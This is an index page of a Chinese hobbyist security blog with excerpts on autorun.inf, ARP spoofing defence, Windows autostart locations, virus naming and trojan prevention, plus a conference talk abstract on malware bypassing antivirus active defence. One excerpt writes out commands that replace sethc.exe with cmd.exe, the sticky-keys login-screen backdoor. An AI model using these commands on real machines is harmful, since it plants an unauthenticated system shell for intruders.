夜火博客 个人的碎碎念收集箱

autorun.inf完全操作手册

夜火:总结的比较全,有用的几乎都写上了,对比以前收集的《病毒的Autorun.inf新写法与应用以及防御》和《彻底杜绝autorun.inf自动运行》对自己写写autorun.inf,或修改,杀毒等颇有帮助

笔者按:鉴于现在网上完全介绍autorun.inf功能的文章不多,笔者在微软官网的一个犄角旮旯找到了一篇autorun.inf的英文使用说明,在翻译和笔者的亲自试验下写出此篇文章。======我是分隔线======一、autorun.inf是windows下操纵光盘行为的一个文件,需要放在光盘根目录下,部分操作对于硬盘也适用。二、autorun.inf是可以被禁止的。方法如下:点击开始->运行,在文本框中输入regedit或者regedt32。依次展开

ARP概念及攻击与防护的原理

最近在论坛上经常看到关于ARP病毒的问题,于是在Google上搜索ARP关键字,结果出来很多关于这类问题的讨论。呵呵,俺的求知欲很强,想再学习ARP下相关知识,所以对目前网络中常见的ARP问题进行了一个总结。 1. ARP概念 咱们谈ARP之前,还是先要知道ARP的概念和工作原理,理解了原理知识,才能更好去面对和分析处理问题。 1.1 ARP概念知识 ARP,全称Address Resolution Protocol,中文名为地址解析协议,它工作在数据链路层,在本层和硬件接口联系,同时对上层提供服务。

高级恶意软件技术新挑战——突破主动防御

文章作者:xyzreg
作者网站:http://www.xyzreg.net
信息来源:邪恶八进制信息安全团队(forum.eviloctal.com)

这是今年我在XCON2007(安全焦点信息安全技术峰会)所演讲的议题,现在提供ppt资料下载
议题介绍:

主动防御技术已被杀毒软件、软件防火墙、HIPS等安全软件广泛采用,现有的后门木马、Rootkit等恶意软件面临严峻考验。无论传统的恶意软件功能有多强大隐蔽性有多高,初次安装以及工作时都会被主动防御功能拦截并提示用户,使其无法正常安装和工作。本议题阐述了主动防御技术的应用现状和原理,并深入 Windows系统内核详细讲解突破主动防御的各种方法和思路。

下载地址: xcon2007_xyzreg.rar

IIS5.1中碰到的8ffe2740和Server Application Error错误

        今天为了更好的学习《精通脚本黑客》和测试体验即将到来的z-blog1.8,在本地机装了IIS5.1,但是问题不断,在此总结下,为以后会碰到同样问题的朋友写写经验(怎么这话听着这么别扭,貌似我多高手是的,其实俺是菜鸟,汗一个先~)。

        我这台机器上装的是专业版的XP,IIS信息服务没有隐藏,免去了恢复显示的麻烦,勾选,安装,都比较顺利。可是安装完成后却访问不了http://localhost,在管理中看了下,默认站点没有启动,手动启动,提示错误:

IIS 无法启动 发生意外错误 8ffe2740

用baidu搜了下相关的内容,很多人说是80端口被占用了,有好几个人是被web迅雷给占了,但是我从来都不用web迅雷的,那玩意是适合普通用户的“低级”产品,我当然要用“专业级”的去广告的迅雷了,难不成这个也占用80端口?

标签: Windows技术类

作者:夜火 分类:技术文章 浏览:4334 评论:3

Windows自启动方式完全总结[zz]

职业欠钱&zj1244那看到的,转来做收藏之用,以后碰到了难缠的病毒木马等可以查查看~

一.自启动项目:
开始---程序---启动,里面添加一些应用程序或者快捷方式.
这是Windows 里面最常见,以及应用最简单的启动方式,如果想一些文件开机时候启动,那么也可以将他拖入里面或者建立快捷方式拖入里面.现在一般的病毒不会采取这样的启动手法.也有个别会.
路径:C:Documents and SettingsOwner「开始」菜单程序启动

二. 第二自启动项目:

如何根据名称识别计算机病毒

        夜火:经过前2天的熊猫变种worm.nimaya.al事件后,就一直想写个判断病毒类型名称什么的文章,给那个中毒的朋友看看,让中毒的那个朋友学学这方面的知识,好自己亲手解决以后碰到的病毒。今天在中关村在线看到了相关的这篇文章,写的比我想的要全面多了,就转过来了,给那个中毒的朋友,和其他需要的朋友学习学习。

        很多时候大家已经用杀毒软件查出了自己的机子中了例如Backdoor.RmtBomb.12 、Trojan.Win32.SendIP.15 等等这些一串英文还带数字的病毒名,这时有些人就懵了,那么长一串的名字,我怎么知道是什么病毒啊?

  其实只要我们掌握一些病毒的命名规则,我们就能通过杀毒软件的报告中出现的病毒名来判断该病毒的一些公有的特性了。

  世界上那么多的病毒,反病毒公司为了方便管理,他们会按照病毒的特性,将病毒进行分类命名。虽然每个反病毒公司的命名规则都不太一样,但大体都是采用一个统一的命名方法来命名的。一般格式为:<病毒前缀>.<病毒名>.<病毒后缀>

.......................

windows系统服务 超详细攻略

  对于我们经常使用的windows 2000/xp这里边有许多服务,那么这些服务都是干什么的呢?我们需要哪些?不需要哪些?在此我向大家做一个介绍……      Win32服务程序由3部分组成:服务应用程序,服务控制程序和服务控制管理器。其中服务控制管理器维护着注册表中的服务数据,服务控制程序则是控制服务应用程序的模块,是控制服务应用程序同服务管理器之间的桥梁。服务应用程序是服务程序的主体程序,他是一个或者多个服务的可执行代码。我们可以在控制面板--管理工具--服务中找到。可以修改他们的当前状态和启动方式,它的启动方式有三种:"自动"是之当计算机启动或者需要的时候就开启。"手动"是可以在命令提示符中通过"net start"命令打开和"net stop"命令关闭的,"已禁止"是指在改变启动方式前,不在启动。  在众多服务程序中他们很多是互相依存的,所以我们不能随便的便停止某项服务,否则很可能造成系统的非正常情况出现,但是有的服务对我们来说的确没有什么作用,而且还占据着我们宝贵的系统资源,其实有很多程序是我们用不到的,可以关闭,从而达到节省资源的目的。

标签: 技术类Windows

作者:夜火 分类:技术文章 浏览:1407 评论:0

网页恶意代码的防疫

  很多情况下好多朋友都被恶意代码烦透了吧,我在各个安全网站到处漫游,看能不能帮大家一把,终于让我找到了这个好文章,大家可以参详一下。不过我开拓进取在这里提醒一下大家,在修改注册表之前一定要备份喔~并且要看准键咯~~`删错了可就……   一、 修改注册表:   我想大部份网友都有过被恶意代码修改过注册表的经历吧,有一招简单的方法是可以永远免疫的, 就是在注册表中删除恶意代码会用到的一个id就可以了, 那就是F935DC22-1CF0-11D0-ADB9-00C04FD58A0B,只要把它删了,那你以后碰到恶意代码,就再也不用担心注册表会再被修改了,它在注册表里面的路径是HKEY_CLASSES_ROOTCLSID{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B} 找到后把整个项删掉就可以了,这个项删掉不会对系统有任何影响,请放心删除。(请注意不要删错了哦)

WINDOWS系统进程知多少

  相信每一个从事计算机的人,都对众多系统关键服务与进程有所了解,但却不是每一个人都能详细说出这些进程,普通用户更是对众多的映象名称知之甚少。近日病毒的猖獗也使得部分用户大呼认识了进程就可以手动删除病毒,其实这样的想法都是片面的。从计算机病毒的发展来看,仅仅伪装系统关键进程或者创建新进程的病毒,几乎可能给用户造成任何影响。在此,笔者将详细介绍Windows操作系统进程的相关知识,使用户可以正确认识什么是进程,进程又都在做些什么。  认识计算机进程  进程是程序在计算机上的一次执行活动。当你运行一个程序,你就启动了一个进程。显然,程序是静态的,进程是动态的。进程可以分为系统进程和用户进程。凡是用于完成操作系统的各种功能的进程就是系统进程,它们就是处于运行状态下的操作系统本身;用户进程就是所有由你启动的进程。进程是操作系统进行资源分配的单位。。。。。。。。。。。。。。。。。。

2000/xp/vista下5次shift的粘滞键利用

      这篇文章里说的方法和欠钱前2天说的用explorer.exe替换sethc.exe然后在3389下用5次shift获得资源管理器的方法差不多,不过做了一些扩展,蛮有意思~

  在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。

  XP:

将安装源光盘弹出(或将硬盘上的安装目录改名)
cd %widnir%system32dllcache
ren sethc.exe *.ex~
cd %widnir%system32
copy /y cmd.exe sethc.exe

  VISTA:

takeown /f c:windowssystem32sethc.exe
cacls c:windowssystem32sethc.exe /G administrator:F
然后按XP方法替换文件

用批处理文件抵御ARP攻击

  ARP欺骗通过伪造IP地址和MAC地址实现,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。 笔者将介绍四种利用自制批处理文件来防御ARP攻击的方法。  一、把下面语句编成BAT处理文件      @echo off 。。。。。。。。。。。。。。。

常见木马防范宝典

 奇虎360安全中心最近发布的《互联网不安全报告》中披露,2007年上半年奇虎共截获病毒、恶意软件及木马程序共计168135个,其中木马程序占据了80%的比例。比如著名的“灰鸽子”木马,仅不完全统计就有大概6万个变种。 可见在现今阶段的互联网,木马的危害已经占据了主导。   谈“马”色变并不是空穴来风,你可能觉得自己已经安装了最新版本的杀毒软件和防火墙,自认铜墙铁壁、百毒不侵。可要命的变种木马程序让病毒库防不胜防。毕竟是先有病毒,再有病毒库更新。目前各大杀毒公司纷纷进入主动杀毒/防御领域,正是因为大家已经意识到面对最新木马病毒的查杀,时间是最关键的因素!   那现阶段呢?我们这些饱受侵害的用户该做些什么呢?其实木马发展到现在,最重要的因素就是其很好的利用了社会工程学原理,在伪装和侵入方式上下足了功夫。这对于木马的整个入侵程序来说最为重要——换句话说:你需要运行木马,才能让自己的计算机中招!今天就针对这一环节,分析当前木马惯用伎俩,不用杀毒软件也能分辨出木马程序。

标签: 安全技术类

作者:夜火 分类:技术文章 浏览:1165 评论:0